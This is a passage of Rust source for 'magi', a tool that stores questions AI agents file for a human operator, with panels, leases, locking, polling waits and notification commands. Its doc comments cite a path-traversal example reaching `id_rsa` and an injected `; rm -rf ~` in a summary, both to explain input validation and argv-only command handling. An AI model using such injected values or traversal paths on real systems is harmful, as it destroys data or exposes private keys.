890                     match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
891                    src.display()
892                );
893            }
894            if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
895                bail!(
896                    "two panel assets are both named `{name}` - {} and {} - and \
897                     the panel can only show one of them; rename one at the source",
898                    first.display(),
899                    src.display()
900                );
901            }
902            named.push((name.to_owned(), src.as_path()));
903        }
904
905        let mut total = html.len() as u64;
906        for (_, src) in &named {
907            let meta = std::fs::metadata(src)
908                .with_context(|| format!("stat panel asset {}", src.display()))?;
909            if !meta.is_file() {
910                bail!(
911                    "panel asset `{}` is not a file; a panel is html plus files \
912                     copied beside it",
913                    src.display()
914                );
915            }
916            total = total.saturating_add(meta.len());
917        }
918        if total > PANEL_MAX_BYTES {
919            bail!(
920                "panel for question {} is {total} bytes, over magi's cap of \
921                 {PANEL_MAX_BYTES} bytes; nothing was written",
922                q.short()
923            );
924        }
925
926        let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
927        let dir = self.panel_dir(&q.id);
928        std::fs::create_dir_all(&self.root)
929            .with_context(|| format!("create {}", self.root.display()))?;
930        clear_dir(&tmp)?;
931        std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
932        if let Err(e) = fill_panel(&tmp, html, &named) {
933            // A copy that dies halfway must not become the panel, and must not
934            // leave scratch behind for the next call to inherit.
935            let _ = std::fs::remove_dir_all(&tmp);
936            return Err(e);
937        }
938        clear_dir(&dir)?;
939        std::fs::rename(&tmp, &dir)
940            .with_context(|| format!("move panel into {}", dir.display()))?;
941
942        q.panel = true;
943        q.assets = named.into_iter().map(|(n, _)| n).collect();
944        q.assets.sort_unstable();
945        Ok(())
946    }
947
948    /// The panel's html, or `None` when the question has no panel.
949    ///
950    /// `None` rather than an error for a missing panel because the caller is a
951    /// web handler whose answer is 404 either way, and an unreadable panel is
952    /// not a reason to fail the question it belongs to.
953    pub fn panel_html(&self, id: &str) -> Option<String> {
954        if !valid_asset_name(id) {
955            return None;
956        }
957        std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
958    }
959
960    /// One file from a panel. `Ok(None)` is "no such file"; `Err` is "that is
961    /// not a name a panel file can have".
962    ///
963    /// Rejects a name failing [`valid_asset_name`] **before touching the
964    /// filesystem**, which is the whole point of the second check: the name
965    /// arrives from a URL, the directory is on disk where any process could
966    /// have dropped a file, and `<root>/<id>.panel/../../id_rsa` is a path the
967    /// operating system would resolve perfectly happily. The two callers'
968    /// distinct outcomes - 400 for a name, 404 for a file - are why this is
969    /// `Result<Option<_>>` rather than one flattened `Option`.
970    pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
971        if !valid_asset_name(name) {
972            bail!(
973                "`{name}` is not a panel file name; it must match \
974                 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
975            );
976        }
977        if !valid_asset_name(id) {
978            return Ok(None);
979        }
980        let dir = self.panel_dir(id);
981        if !dir.is_dir() {
982            return Ok(None);
983        }
984        let path = dir.join(name);
985        match std::fs::read(&path) {
986            Ok(bytes) => Ok(Some(bytes)),
987            Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
988            Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
989        }
990    }
991
992    /// Delete a question's panel, and any scratch a killed [`put_panel`] left.
993    ///
994    /// Succeeds when there is nothing to delete, so a caller cleaning up does
995    /// not have to know whether a panel was ever written. The question record
996    /// is not touched: the caller clears `panel` and `assets` and `put`s it,
997    /// in the same order as everywhere else here.
998    ///
999    /// [`put_panel`]: Questions::put_panel
1000    pub fn drop_panel(&self, id: &str) -> Result<()> {
1001        if !valid_asset_name(id) {
1002            bail!("question id `{id}` is not a name magi will build a panel path from");
1003        }
1004        clear_dir(&self.panel_dir(id))?;
1005        clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1006    }
1007
1008    /// Path of the lease sidecar for one question id.
1009    pub fn lease_path(&self, id: &str) -> PathBuf {
1010        self.root.join(format!("{id}.lease"))
1011    }
1012
1013    /// The lease on a question, if a readable one exists.
1014    pub fn read_lease(&self, id: &str) -> Option<Lease> {
1015        let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1016        serde_json::from_str(&body).ok()
1017    }
1018
1019    /// Say, as `kind`, that something is alive and waiting on this question.
1020    ///
1021    /// Best-effort: a beat that cannot be written is a `tracing::debug`, never
1022    /// a reason to abandon a wait - the worst it costs is the waiter deciding
1023    /// the holder is gone a little early, and that is what the delivery guard
1024    /// (the seat still being busy) is there for.
1025    pub fn beat(&self, id: &str, kind: WaiterKind) {
1026        let lease = Lease {
1027            kind,
1028            pid: std::process::id(),
1029            beat_at: Timestamp::now(),
1030        };
1031        let path = self.lease_path(id);
1032        let tmp = path.with_extension("lease.tmp");
1033        let written = std::fs::create_dir_all(&self.root)
1034            .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1035            .and_then(|()| std::fs::rename(&tmp, &path));
1036        if let Err(e) = written {
1037            tracing::debug!("could not beat the lease on question {id}: {e}");
1038        }
1039    }
1040
1041    /// Remove the lease sidecar. Absent is fine.
1042    pub fn drop_lease(&self, id: &str) {
1043        let _ = std::fs::remove_file(self.lease_path(id));
1044    }
1045
1046    /// Read-modify-write one question under a short exclusive lock, so the
1047    /// waiter's bookkeeping, the asker's and the phone's `say` cannot overwrite
1048    /// each other with a copy that predates the others.
1049    ///
1050    /// [`Questions::put`] is an atomic *replace*, which protects a reader from
1051    /// a torn file and does nothing for two writers that both read the same
1052    /// version first. Everything that changes a question that can still be
1053    /// answered goes through here: `f` sees the current record, not one loaded
1054    /// earlier. A lock older than [`LOCK_STALE`] belongs to a writer that died
1055    /// mid-update and is broken.
1056    pub fn update<T>(
1057        &self,
1058        id: &str,
1059        f: impl FnOnce(&mut Question) -> Result<T>,
1060    ) -> Result<(Question, T)> {
1061        std::fs::create_dir_all(&self.root)
1062            .with_context(|| format!("create {}", self.root.display()))?;
1063        let lock = self.root.join(format!("{id}.lock"));
1064        let started = std::time::Instant::now();
1065        loop {
1066            match std::fs::OpenOptions::new()
1067                .write(true)
1068                .create_new(true)
1069                .open(&lock)
1070            {
1071                Ok(_) => break,
1072                Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1073                    let stale = std::fs::metadata(&lock)
1074                        .and_then(|m| m.modified())
1075                        .ok()
1076                        .and_then(|t| t.elapsed().ok())
1077                        .is_some_and(|age| age > LOCK_STALE);
1078                    if stale {
1079                        let _ = std::fs::remove_file(&lock);
1080                    } else if started.elapsed() > LOCK_STALE {
1081                        bail!("could not lock question {id}");
1082                    } else {
1083                        std::thread::sleep(Duration::from_millis(15));
1084                    }
1085                }
1086                Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1087            }
1088        }
1089        struct Unlock(PathBuf);
1090        impl Drop for Unlock {
1091            fn drop(&mut self) {
1092                let _ = std::fs::remove_file(&self.0);
1093            }
1094        }
1095        let _guard = Unlock(lock);
1096        let mut q = read_path(&self.path_of(id))?;
1097        let out = f(&mut q)?;
1098        self.put(&mut q)?;
1099        Ok((q, out))
1100    }
1101
1102    /// Write a question, atomically, so a process killed mid-write leaves the
1103    /// previous state readable rather than a truncated file that would strand
1104    /// the run waiting on it.
1105    pub fn put(&self, q: &mut Question) -> Result<()> {
1106        std::fs::create_dir_all(&self.root)
1107            .with_context(|| format!("create {}", self.root.display()))?;
1108        let body = serde_json::to_string_pretty(q).context("serialize question")?;
1109        let path = self.path_of(&q.id);
1110        let tmp = path.with_extension("json.tmp");
1111        let is_new = !path.exists();
1112        std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1113        std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1114        // A first write of an open question pages the operator, so a separate
1115        // notification about the same task or run is now a second page.
1116        if is_new
1117            && q.status.open()
1118            && q.node != crate::bump::NOTICE_NODE
1119            && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1120        {
1121            crate::notices::quiet_for(home, q);
1122        }
1123        Ok(())
1124    }
1125
1126    /// Load a question by id or unambiguous id prefix.
1127    pub fn get(&self, id: &str) -> Result<Question> {
1128        let resolved = self.resolve_id(id)?;
1129        read_path(&self.path_of(&resolved))
1130    }
1131
1132    /// Every question on disk: open first, then newest first.
1133    ///
1134    /// Open first because that ordering is the product - the list exists to
1135    /// show the operator what has stopped, and an answered question is history
1136    /// underneath it. Unreadable files are skipped rather than fatal: one
1137    /// corrupt question must not take the web UI down, and must certainly not
1138    /// hide the open question the operator was looking for.
1139    pub fn list(&self) -> Vec<Question> {
1140        let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1141            .into_iter()
1142            .flatten()
1143            .flatten()
1144            .map(|e| e.path())
1145            .filter(|p| p.extension().is_some_and(|x| x == "json"))
1146            .filter_map(|p| read_path(&p).ok())
1147            .collect();
1148        all.sort_unstable_by(|a, b| {
1149            let rank = |q: &Question| u8::from(!q.status.open());
1150            rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1151        });
1152        all
1153    }
1154
1155    /// Open questions belonging to one run, newest first.
1156    ///
1157    /// Used to decide whether a parked run can be resumed: while this is
1158    /// non-empty, nothing about the run has changed and no agent should be
1159    /// spawned for it.
1160    pub fn open_for(&self, run: &str) -> Vec<Question> {
1161        self.list()
1162            .into_iter()
1163            .filter(|q| q.status.open() && q.run == run)
1164            .collect()
1165    }
1166
1167    /// Abandon every open question belonging to a run, and report how many.
1168    ///
1169    /// Called when a run's record is deleted. The agent that asked died with
1170    /// the run, so there is nobody left to hand an answer to, and a question
1171    /// left open would keep asking the operator for a decision that can no
1172    /// longer be delivered - the phone showed exactly that: "auth.rs というファ
1173    /// イルが見つかりません" with two buttons, for a run whose directory had
1174    /// been gone for two hours.
1175    ///
1176    /// Abandoned rather than deleted, because [`Question::abandon`] already
1177    /// means "this can no longer be answered" and the record of having asked
1178    /// is worth keeping. Answered questions are left exactly as they are.
1179    pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1180        let mut abandoned = 0;
1181        for mut q in self.open_for(run) {
1182            q.abandon(why);
1183            self.put(&mut q)?;
1184            abandoned += 1;
1185        }
1186        Ok(abandoned)
1187    }
1188
1189    /// Abandon a run's open questions once `status` says the run is not
1190    /// coming back, worded with what it actually became.
1191    ///
1192    /// The run-deleted case above and this one are the same fact - nobody is
1193    /// left to read an answer - reached by two different doors. This is the
1194    /// one for a run that finished on its own: merged, reached `Ready` with
1195    /// nothing left to do, failed outright with no established point to
1196    /// resume from, or every candidate agreed, with evidence, that nothing
1197    /// belonged in the worktree. Those are exactly the statuses
1198    /// [`RunStatus::resumable`]
1199    /// excludes, and that is the line this draws too - deliberately not
1200    /// [`RunStatus::done`], which also counts `Blocked` and `Stalled` as
1201    /// over. Both of those can still be picked back up with the candidates,
1202    /// the review round and the seat sessions already on disk, so a question
1203    /// asked mid-round may yet get a real answer from a real resume, and
1204    /// folding it here would be exactly the mistake this function exists to
1205    /// avoid on the other side - answering back into a run that no longer
1206    /// exists to read it.
1207    ///
1208    /// A no-op, not an error, when `status` is still resumable or when there
1209    /// was nothing open to begin with - callers reach this from more than one
1210    /// place a run can settle, and a second call finding nothing left to
1211    /// abandon is the expected case, not a bug.
1212    pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1213        if status.resumable() {
1214            return Ok(0);
1215        }
1216        let why = format!(
1217            "run {run} {}, so nothing is waiting for this answer",
1218            status.as_str()
1219        );
1220        // A post-merge notice is the exception: it is filed *because* the run
1221        // merged, and no agent waits on it - it is a to-do for the owner, not
1222        // a question a dead seat asked. Abandoning it here would erase the
1223        // only alert the moment the run settles.
1224        let mut abandoned = 0;
1225        for mut q in self.open_for(run) {
1226            if q.node == crate::bump::NOTICE_NODE {
1227                continue;
1228            }
1229            q.abandon(&why);
1230            self.put(&mut q)?;
1231            abandoned += 1;
1232        }
1233        Ok(abandoned)
1234    }
1235
1236    /// Expand an id prefix to exactly one question id. The short id the phone
1237    /// and the reports show is a suffix, so that is accepted too.
1238    pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1239        if self.path_of(prefix).is_file() {
1240            return Ok(prefix.to_owned());
1241        }
1242        let hits: Vec<String> = self
1243            .list()
1244            .into_iter()
1245            .map(|q| q.id)
1246            .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1247            .collect();
1248        match hits.len() {
1249            1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1250            0 => bail!("no question matches `{prefix}`"),
1251            _ => bail!(
1252                "`{prefix}` matches {} questions: {}",
1253                hits.len(),
1254                hits.join(", ")
1255            ),
1256        }
1257    }
1258
1259    /// Newest modification time in the store, in milliseconds, for change
1260    /// detection. The web UI compares this instead of re-reading every
1261    /// question, so an idle phone on a slow link costs one `stat` per file.
1262    pub fn revision(&self) -> u64 {
1263        std::fs::read_dir(&self.root)
1264            .into_iter()
1265            .flatten()
1266            .flatten()
1267            .filter_map(|e| e.metadata().ok())
1268            .filter_map(|m| m.modified().ok())
1269            .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1270            .map(|d| d.as_millis() as u64)
1271            .max()
1272            .unwrap_or(0)
1273    }
1274
1275    /// How many questions are open, whichever side of the conversation is
1276    /// holding the ball right now. Ten turns of back and forth between the
1277    /// owner and the agent are still one open question - see
1278    /// [`Question::say`] - so this does not drop while a reply is in
1279    /// flight. [`Self::count_needs_owner`] is the number that does.
1280    pub fn count_open(&self) -> usize {
1281        self.list().iter().filter(|q| q.status.open()).count()
1282    }
1283
1284    /// How many open questions actually need the owner right now: open, and
1285    /// not [`Question::waiting_on_agent`].
1286    ///
1287    /// This is the number a notification channel owes - the ask bar, the nav
1288    /// badge, the document title - because those exist to say "something
1289    /// needs you", and a question sitting in `magi ask --thread` limbo does
1290    /// not. `count_open` stays as it is for [`Self::open_for`]'s callers,
1291    /// where a round trip must not look like the run resumed.
1292    pub fn count_needs_owner(&self) -> usize {
1293        self.list()
1294            .iter()
1295            .filter(|q| q.status.open() && !q.waiting_on_agent())
1296            .count()
1297    }
1298}
1299
1300/// How a wait over [`Question`] ended.
1301#[derive(Debug, Clone, PartialEq, Eq)]
1302pub enum Wait {
1303    /// The owner decided. Carries [`Question::resolution`].
1304    Answered(String),
1305    /// The owner spoke back without deciding - see [`Question::say`]. The
1306    /// question is still [`QuestionStatus::Open`] and carries no [`Answer`];
1307    /// the caller's move is to hand this text to the agent and let it call
1308    /// `magi ask --thread` to keep talking, not to treat it as a decision.
1309    Replied(String),
1310    /// This call's [`WAIT_SLICE`] ran out with the question still
1311    /// [`QuestionStatus::Open`] and nothing having happened - not the owner
1312    /// going quiet, the clock on *this process* running out. The question is
1313    /// untouched; the caller's move is `magi ask --wait <id>` in a fresh
1314    /// process, so the wait resumes before the shell tool that would have
1315    /// killed this one gets the chance.
1316    Pending,
1317    /// Nobody said anything before the deadline, or the question was closed
1318    /// out from under the wait with no decision recorded - a run deleted out
1319    /// from under it, most often. Either way [`QuestionStatus::Abandoned`] is
1320    /// now on disk.
1321    Abandoned,
1322}
1323
1324/// File a question and wait for the owner, polling the store.
1325///
1326/// The question is updated in place from disk whenever the wait ends, so the
1327/// caller can act on it without re-reading it. `timeout` is the question's
1328/// whole `answer_timeout` budget, but this call spends at most [`WAIT_SLICE`]
1329/// of it - see [`Wait::Pending`] for what happens to the rest.
1330pub async fn ask_and_wait(
1331    q: &mut Question,
1332    store: &Questions,
1333    notify: &config::Notify,
1334    timeout: Duration,
1335) -> Result<Wait> {
1336    wait_for_owner(q, store, notify, timeout, POLL).await
1337}
1338
1339/// Resume a wait already filed, without adding a turn or notifying again.
1340///
1341/// This is `magi ask --wait <id>`'s engine: the process that owned the
1342/// previous slice is dead (the tool that ran it killed it, or it simply
1343/// exited after reporting [`Wait::Pending`]), but the question on disk never
1344/// stopped being open, and the owner was already notified about it once. A
1345/// second notification for the same unanswered question would page the
1346/// owner every [`WAIT_SLICE`] for a question they have already seen - so,
1347/// unlike [`ask_and_wait`], this skips straight to polling.
1348///
1349/// `timeout` is **not** re-armed to a fresh `answer_timeout` here - the
1350/// caller computes it as what remains until [`Question::asked_at`] plus the
1351/// configured `answer_timeout`, so stacking `--wait` calls can only ever use
1352/// up the deadline the first ask set, never push it out further.
1353pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1354    wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1355}
1356
1357/// [`ask_and_wait`] with the poll interval injected.
1358///
1359/// Separate only so the tests can drive a whole wait in milliseconds instead of
1360/// sleeping through [`POLL`]; production has exactly one interval, and it is not
1361/// a knob the operator gets to tune.
1362async fn wait_for_owner(
1363    q: &mut Question,
1364    store: &Questions,
1365    cfg: &config::Notify,
1366    timeout: Duration,
1367    poll: Duration,
1368) -> Result<Wait> {
1369    // A question that is already on disk (a `--thread` reply just wrote it under
1370    // the lock) is left alone: this copy may predate an answer or say that
1371    // landed since, and writing it back would erase that.
1372    if !store.path_of(&q.id).is_file() {
1373        store.put(q).context("file the question")?;
1374    }
1375    if q.should_notify(Timestamp::now()) {
1376        if let Err(e) = notify(cfg, q).await {
1377            // A broken webhook is not a reason to throw away an implementation.
1378            // The question is already on disk and the web UI already shows it,
1379            // so the operator still has a way in; only the tap on the shoulder
1380            // is lost.
1381            tracing::warn!(
1382                "could not notify about question {}: {e:#} - the web UI is the \
1383                 only surface for it now",
1384                q.short()
1385            );
1386        }
1387    }
1388    tracing::info!(
1389        "question {} from {} is waiting for you: {}",
1390        q.short(),
1391        q.seat,
1392        q.summary
1393    );
1394    wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1395}
1396
1397/// Take the wait as this process: beat the lease and note it on the record.
1398fn hold(store: &Questions, id: &str) {
1399    store.beat(id, WaiterKind::Asker);
1400    let took = store.update(id, |q| {
1401        if q.status.open() {
1402            q.waiter = Some(Waiter {
1403                kind: WaiterKind::Asker,
1404                since: Timestamp::now(),
1405            });
1406        }
1407        Ok(())
1408    });
1409    if let Err(e) = took {
1410        tracing::debug!("could not note the wait on question {id}: {e:#}");
1411    }
1412}
1413
1414/// Record that the agent has read everything so far, so the daemon waiter does
1415/// not resume a session to tell it what was already printed.
1416///
1417/// Callers must invoke this only **after** the word reached the agent's stdout:
1418/// marking first would let a tool timeout kill the process between the mark
1419/// and the print, and the waiter would then consider a word delivered that no
1420/// agent ever saw.
1421pub fn hand_over(store: &Questions, q: &mut Question) {
1422    let done = store.update(&q.id, |r| {
1423        r.delivered_turns = r.delivered_turns.max(q.thread.len());
1424        if r.status == QuestionStatus::Answered {
1425            r.answer_delivered = true;
1426        }
1427        r.waiter = None;
1428        Ok(())
1429    });
1430    match done {
1431        Ok((fresh, ())) => *q = fresh,
1432        Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1433    }
1434}
1435
1436/// The polling loop shared by a fresh wait and a resumed one.
1437///
1438/// `timeout` is the budget left before the question's `answer_timeout`
1439/// truly runs out; `slice` bounds how much of that this one call spends
1440/// before handing control back. Landing on `slice` while `timeout` still has
1441/// budget left is [`Wait::Pending`] - the caller's move, not the owner's
1442/// silence. Landing on `timeout` itself - because it was no bigger than
1443/// `slice` to begin with - is the real thing, and abandons the question
1444/// exactly as a single unsliced wait always did.
1445async fn wait_loop(
1446    q: &mut Question,
1447    store: &Questions,
1448    timeout: Duration,
1449    slice: Duration,
1450    poll: Duration,
1451) -> Result<Wait> {
1452    // The owner may already have spoken back before this call ever started -
1453    // most often because they did so in the gap between an earlier call
1454    // reporting `Wait::Pending` and this one picking the wait back up with
1455    // `--wait`. That word must surface at once rather than sit unnoticed
1456    // until some *later* turn happens to change something: this call never
1457    // saw it get added, so nothing below would otherwise recognise it as
1458    // new. `last_word_awaiting_reply` reads the question's own record of
1459    // whose turn it is - see [`Question::waiting_on_agent`] - rather than a
1460    // turn count this call would have to have been there to capture.
1461    if let Some(said) = q.unread_from_owner() {
1462        return Ok(Wait::Replied(said));
1463    }
1464    hold(store, &q.id);
1465
1466    let bounded = timeout.min(slice);
1467    let is_the_real_deadline = bounded >= timeout;
1468    let deadline = tokio::time::Instant::now() + bounded;
1469    loop {
1470        let now = tokio::time::Instant::now();
1471        if now >= deadline {
1472            if !is_the_real_deadline {
1473                // The lease is left to age out on purpose: the caller is about
1474                // to run `magi ask --wait`, and that gap is what LEASE_TTL
1475                // covers.
1476                return Ok(Wait::Pending);
1477            }
1478            let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1479            // Re-checked on the record as it is now: the owner may have said
1480            // something in time since the last poll, and that word is handed
1481            // over, not abandoned.
1482            let (fresh, unread) = store
1483                .update(&q.id, |r| {
1484                    let unread = r.unread_from_owner();
1485                    if unread.is_none() {
1486                        r.abandon(&why);
1487                        r.waiter = None;
1488                    }
1489                    Ok(unread)
1490                })
1491                .context("record the abandoned question")?;
1492            *q = fresh;
1493            if let Some(said) = unread {
1494                return Ok(Wait::Replied(said));
1495            }
1496            tracing::warn!(
1497                "question {} went unanswered for {}s; the run parks and the \
1498                 question stays as the record of it",
1499                q.short(),
1500                timeout.as_secs()
1501            );
1502            return Ok(Wait::Abandoned);
1503        }
1504        tokio::time::sleep(poll.min(deadline - now)).await;
1505        store.beat(&q.id, WaiterKind::Asker);
1506        match store.get(&q.id) {
1507            Ok(fresh) if !fresh.status.open() => {
1508                // Whoever answered - the phone, `magi answer`, another daemon -
1509                // owns the record now, so adopt theirs wholesale rather than
1510                // merging into a copy that predates it.
1511                *q = fresh;
1512                return Ok(match q.resolution() {
1513                    Some(a) => Wait::Answered(a),
1514                    // Closed with no decision - abandoned elsewhere, most
1515                    // often by the run behind it being deleted mid-wait.
1516                    None => Wait::Abandoned,
1517                });
1518            }
1519            Ok(fresh) => {
1520                if let Some(said) = fresh.unread_from_owner() {
1521                    *q = fresh;
1522                    return Ok(Wait::Replied(said));
1523                }
1524                // Still open and not waiting on the agent - nothing this
1525                // wait cares about happened, so keep polling.
1526            }
1527            Err(e) => {
1528                // Mid-rename, or a file the operator is editing by hand.
1529                // Neither is a reason to abandon a question a human may still
1530                // answer, so keep polling until the deadline decides.
1531                tracing::debug!("could not re-read question {}: {e:#}", q.short());
1532            }
1533        }
1534    }
1535}
1536
1537/// Run the operator's notification command, if one is configured.
1538///
1539/// The command is argv, never a shell string, and the substitutions below are a
1540/// single pass over each argument: a summary containing `; rm -rf ~` is one
1541/// argument to one program, and a summary containing the characters `{run}` is
1542/// not re-expanded. That property is the reason agent-authored text can be put
1543/// in a notification at all.
1544///
1545/// An error here is reported, not swallowed, so `magi notify --test` can show
1546/// the operator why nothing arrives. The waiting path logs it and carries on.
1547pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1548    notify_text(cmd, &q.run, &q.summary).await
1549}
1550
1551/// [`notify`] for an event that is not a question: the same command, the same
1552/// placeholders, with `summary` and `run` supplied directly.
1553pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1554    let Some((program, args)) = cmd.command.split_first() else {
1555        // No command configured: the web UI is the only surface, by choice.
1556        return Ok(());
1557    };
1558    let url = web_url();
1559    if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1560        tracing::warn!(
1561            "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1562             so the link will be empty - export it next to `magi serve` with \
1563             the address `magi web --open` printed"
1564        );
1565    }
1566    let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1567    tracing::debug!(program = %program, args = ?argv, "notifying");
1568
1569    let mut child = tokio::process::Command::new(program);
1570    child.quiet();
1571    child
1572        .args(&argv)
1573        .stdin(std::process::Stdio::null())
1574        // Killed if the timeout below drops this future: a notification
1575        // command left running would outlive the run it was announcing.
1576        .kill_on_drop(true);
1577    let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1578        Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1579        Err(_) => bail!(
1580            "notification command `{program}` did not finish within {}s",
1581            NOTIFY_TIMEOUT.as_secs()
1582        ),
1583    };
1584    if !out.status.success() {
1585        let stderr = String::from_utf8_lossy(&out.stderr);
1586        let why = stderr
1587            .lines()
1588            .rev()
1589            .find(|l| !l.trim().is_empty())
1590            .unwrap_or("no output on stderr")
1591            .trim();
1592        bail!(
1593            "notification command `{program}` exited with {}: {why}",
1594            out.status
1595        );
1596    }
1597    Ok(())
1598}
1599
1600/// Substitute `{summary}`, `{run}` and `{url}` into one argument.
1601///
1602/// One left-to-right pass, so a substituted value is never scanned for further
1603/// placeholders. Agent prose contains braces, and an agent quoting `{summary}`
1604/// in a question must not make the notification recursive.
1605fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1606    let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1607    let mut out = String::with_capacity(template.len());
1608    let mut rest = template;
1609    while let Some(at) = rest.find('{') {
1610        out.push_str(&rest[..at]);
1611        let tail = &rest[at..];
1612        match table.iter().find(|(token, _)| tail.starts_with(token)) {
1613            Some((token, value)) => {
1614                out.push_str(value);
1615                rest = &tail[token.len()..];
1616            }
1617            None => {
1618                // Not a placeholder magi knows: it is the operator's own text.
1619                out.push('{');
1620                rest = &tail[1..];
1621            }
1622        }
1623    }
1624    out.push_str(rest);
1625    out
1626}
1627
1628/// The URL `{url}` expands to, from [`WEB_URL_ENV`].
1629fn web_url() -> String {
1630    question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1631}
1632
1633/// Point a configured base URL at the view that can answer the question.
1634///
1635/// A notification the operator has to navigate from is a question that stays
1636/// unanswered until morning, so the questions view is appended - unless the
1637/// operator already wrote a fragment, in which case they have said where they
1638/// want to land and magi does not know better.
1639fn question_url(base: &str) -> String {
1640    let base = base.trim().trim_end_matches('/');
1641    if base.is_empty() || base.contains('#') {
1642        return base.to_owned();
1643    }
1644    format!("{base}/#/questions")
1645}
1646
1647/// Assemble a panel's contents in an already-empty directory.
1648///
1649/// Split out so [`Questions::put_panel`] can delete the whole directory on the
1650/// first error without an early `return` skipping that cleanup.
1651fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1652    let index = dir.join(PANEL_HTML);
1653    std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1654    for (name, src) in assets {
1655        let dst = dir.join(name);
1656        std::fs::copy(src, &dst)
1657            .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1658    }
1659    Ok(())
1660}
1661
1662/// Remove a directory and everything under it, treating "not there" as done.
1663///
1664/// A panel is replaced wholesale and dropped idempotently, and in both cases
1665/// the absence of the directory is the desired end state, not an error.
1666fn clear_dir(path: &Path) -> Result<()> {
1667    match std::fs::remove_dir_all(path) {
1668        Ok(()) => Ok(()),
1669        Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1670        Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1671    }
1672}
1673
1674fn read_path(path: &Path) -> Result<Question> {
1675    let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1676    let q: Question =
1677        serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1678    if q.schema > SCHEMA {
1679        // Strictly newer, not merely different: every field added since
1680        // schema 1 carries `#[serde(default)]`, so an *older* schema reads
1681        // here as "no thread yet" rather than as garbage. Only a schema this
1682        // build has never heard of is refused.
1683        bail!(
1684            "question {} was written by a newer magi (schema {}, this build \
1685             only speaks up to {SCHEMA})",
1686            q.id,
1687            q.schema
1688        );
1689    }
1690    Ok(q)
1691}
1692
1693/// [`short`] for callers outside this module (a run id shortens the same way).
1694pub fn short_id(id: &str) -> &str {
1695    short(id)
1696}
1697
1698fn short(id: &str) -> &str {
1699    id.split('-').next_back().unwrap_or(id)
1700}
1701
1702fn new_id() -> String {
1703    let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1704    let seed = crate::rng::entropy();
1705    format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1706}
1707
1708#[cfg(test)]
1709mod tests {
1710    use super::*;
1711
1712    /// A store of its own, with no process-global state - which is the point of
1713    /// `Questions::at`, and why these can run in parallel.
1714    fn store() -> (tempfile::TempDir, Questions) {
1715        let dir = tempfile::tempdir().unwrap();
1716        let s = Questions::at(dir.path().join("questions"));
1717        (dir, s)
1718    }
1719
1720    #[test]
1721    fn deleting_a_run_stops_its_questions_asking() {
1722        let (_dir, store) = store();
1723
1724        let mut open_one = choice_question();
1725        store.put(&mut open_one).unwrap();
1726        let mut answered = free_question();
1727        answered
1728            .answer(Answer::Text("keep this".to_owned()))
1729            .unwrap();
1730        store.put(&mut answered).unwrap();
1731        let mut elsewhere = choice_question();
1732        elsewhere.run = "20260903-105039-3cbf".to_owned();
1733        store.put(&mut elsewhere).unwrap();
1734
1735        let n = store
1736            .abandon_for_run(&open_one.run, "run was deleted")
1737            .unwrap();
1738        assert_eq!(n, 1, "only the open question of that run");
1739
1740        let back = store.get(&open_one.id).unwrap();
1741        assert!(!back.status.open(), "it no longer asks for a decision");
1742        assert!(
1743            back.detail.contains("run was deleted"),
1744            "the operator can see why: {}",
1745            back.detail
1746        );
1747
1748        let kept = store.get(&answered.id).unwrap();
1749        assert_eq!(
1750            kept.status,
1751            QuestionStatus::Answered,
1752            "an answered question is a decision on record, not something to revoke"
1753        );
1754        assert!(
1755            store.get(&elsewhere.id).unwrap().status.open(),
1756            "another run's question is untouched"
1757        );
1758        assert!(store.open_for(&open_one.run).is_empty());
1759    }
1760
1761    #[test]
1762    fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
